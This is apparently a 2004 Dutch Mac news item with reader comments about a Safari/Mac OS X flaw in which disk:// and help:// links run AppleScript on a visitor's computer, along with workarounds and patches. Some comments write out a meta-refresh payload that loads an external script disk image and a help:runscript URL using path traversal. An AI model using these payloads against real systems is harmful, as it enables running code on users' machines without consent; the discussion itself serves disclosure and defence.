Afgelopen weekeinde is een manier bekend geworden waarmee willekeurige code (bv. een AppleScript dat al je bestanden wist) kan worden uitgevoerd als de gebruiker op een speciaal geconstrueerde link klikt in een webbrowser.

Dit gebeurd door middels het "disk://"-protocol een schijfbestand met de (mogelijk) kwaadaardige code te mounten in het systeem. Daarmee is het pad naar de code op het doelwit bekend. Daarna kan middels een "meta-refresh" de code gestart worden via het "help://"-protocol.  Dat dit werkt blijkt door te klikken op deze link die (in dit geval veilige code) uitvoert op jouw computer!

Een aantal suggesties die worden gegeven op het internet zijn zeker niet doeltreffend genoeg! Browsen met een andere browser dan Safari heeft geen nut. Het uitzetten van het automatisch openen van zgn. "veilige" bestanden in de voorkeuren helpt niet! Ook het verwijderen of aanpassen van het script "OpnApp.scpt" is niet in alle gevallen afdoende.

Het is aan te raden om het "helper"-programma voor het "help://"-protocol te veranderen, dit kan met bijv. MisFox of More Internet. Selecteer i.p.v. Help-viewer bv. Teksteditor. Nadeel is wel dat Help nu niet langer altijd goed zal werken. Nu zal Teksteditor opstarten, maar aangezien het niet weet hoe het "help://"-protocol af te handelen, zal de poging om de code uit te voeren mislukken. Verder is het goed uitkijken op welke links je klikt!

Bij mijn weten heeft Apple nog geen reactie gegeven op dit veiligheidsprobleem.

Update:Volgens een artikel om MacNN heeft Apple ondertussen aangekondigd dit probleem heel serieus te nemen en te onderzoeken.

Kan dit misschien vertaald worden naar begrijpelijke taal,
zodat niet-deskundigen er iets mee kunnen?

Volgens mij is de tekst al in het Nederlands... misschien zegt een plaatje meer?!

@Kool,

Heb even bij de Systeemvoorkeuren zitten kijken, maar die afbeelding van jouw kan ik niet terug vinden !
Wat heb jij, wat ik niet heb  

Groetjes van Dreman

Ik heb More Internet geïnstalleerd (de 2e link bij de oplossingen).

Heb dat linkje geprobeerd. Er wordt wel een dmg gedownload maar niet automatisch gemount. Vervolgens wordt help opgestart en kan hij het bestand op de mount niet vinden (omdat er niet gemount is). Nou is het an sich al eng genoeg dat er een applicatie (help) opstart kan worden vanuit een HTML pagina...

Klopt, het voorbeeld maakt geen gebruik van de disk:// methode. Zou de code in de linkerframe i.p.v. dit

< meta HTTP-EQUIV="refresh" content="0; URL=http://www.free-go.net/insecure/safari/0x04_script.dmg">


dit bevatten, dan was het effectiever:

< meta HTTP-EQUIV="refresh" content="0; URL=disk://www.free-go.net/insecure/safari/0x04_script.dmg">

Disk:// laadt ook als de instelling in Safari uitstaat.

De vraag is alleen of het gebruikt gaat worden, een link op een site is niet zo bedreigend als een worm of een e-mail virus. Een maker van een dergelijk virus zal hoogstwaarschijnlijk geen druk bezochte site hebben waar mensen allemaal op die link klikken. ik bedoel

I still don't see any threat...

We weten toch allemaal al jaren dat je d.m.v. AppleScript hele enge dingen kan doen? Het verbaast mij namelijk dat er nu pas van dit soort scripts aan de orde komen. Sorry hoor, maar iedereen die een beetje thuis is in AppleScript kan een virus maken. Het is niet echt een uitdaging vind ik! Ik weet niet hoe dat met windows is, of dat ook zo makkelijk te scripten is?

Kool om 12:18, 18-05-2004

Dit gebeurd door middels het "disk://"-protocol een schijfbestand met de (mogelijk) kwaadaardige code te mounten in het systeem. Daarmee is het pad naar de code op het doelwit bekend. Daarna kan middels een "meta-refresh" de code gestart worden via het "help://"-protocol.

Het is ook mogelijk dat de link zelf een commando bevat, bijv.: 'help:runscript=../../Scripts/Info Scripts/Current Date & Time.scpt'. Kopieer die maar eens in je URL-veld in de browser.

En ik begrijp inderdaad dat dit in principe in elke browser werkt, ik dacht dat ik veilig zat met Camino  

@PowerbookPat: Ja, een AppleScript schrijven kan iedereen, maar het laten lopen van dat script op een andere computer dan de jouwe, dat zou niet moeten mogen! En dat kan nu wel! Ik wil niet dat andermans scripts op mijn computer draaien zonder dat ik ze eerst zelf uitvoerig bekeken heb!

@Christian Zielinski: Hits op een link krijgen is niet zo moeilijk hoor... beloof iets uitdagends (gratis serials, Maxima in d'r onderbroek, wat jij wil...) in een veelbezocht forum (deze?) en je zal zien dat de hits binnenstromen!

Toevallig had m$ ook zo'n hole in het help protocol zitten. Ik hoop wel dat Apple een beetje snel komt met een security update EN voor ALLE versies die onveilig zijn.

(Bewerkt door Bram Beernink om 16:50, 18-05-2004)

Belachelijk zeg, dit had ik niet van Apple verwacht. Maar ja, je kan er op zitten wachten natuurlijk. Het hele OS X is tenslotte op een niet veilige basis gebouwd. Ook freeBSD is te hacken. Zover ik weet is OS9 daarentegen nog nooit gehackt.

Affijn, zolang Apple maar een beetje snel met een oplossing komt, anders moet ik ook nog een anti-virus pakket gaan aanschaffen.  

Maak je geen illusies:
niets is perfect, dus Apple ook niet,
een viruspakket helpt in dit geval ook al niet.

Nieuwsflits krijgt een update: Apple heeft aangekondigd dit probleem zeer serieus te nemen.

Dat is mooi om te horen. Bij m$ duurde de patch voor het help protocol volgens mij een eeuwigheid.

(Bewerkt door Bram Beernink om 11:27, 19-05-2004)

Apple is zoals gewoonlijk "te laat".
Programmeurs zijn al bezig geweest om een fix te maken
die zorgt dat het help:// protocool niet kan worden opgeroepen.
Vind het programma hier

Hoewel dit een tamelijk grove fout is van Apple, vind ik het eigenlijk een vreemd soort 'lek'. Het heeft ook niet iets met de onveiligheid van BSD te maken ofzo: Apple heeft dit als 'feature' ingevoerd en er niet bij nagedacht wat daarbij fout kan gaan. Net zoiets als die bug van IE waarbij je adres wat er betrouwbaar uitzag kon laten linken naar een 'foute' site.

Toch eerder een ondoordachtzaamheid dan een echt lek in het systeem, zoals bijvoorbeeld het probleem met de root-access vanaf de DHCP server.

iemand heeft een goede opsomming geschreven van je allemaal kan doen om het gat voorlopig te dichten (poezie?).

http://www.marihart.org/leo/tao/hole_filling/

interessant vind ik het prefpane RC Default App 1.1 te vinden op macupdate.

http://www.macupdate.com/info.php/id/14618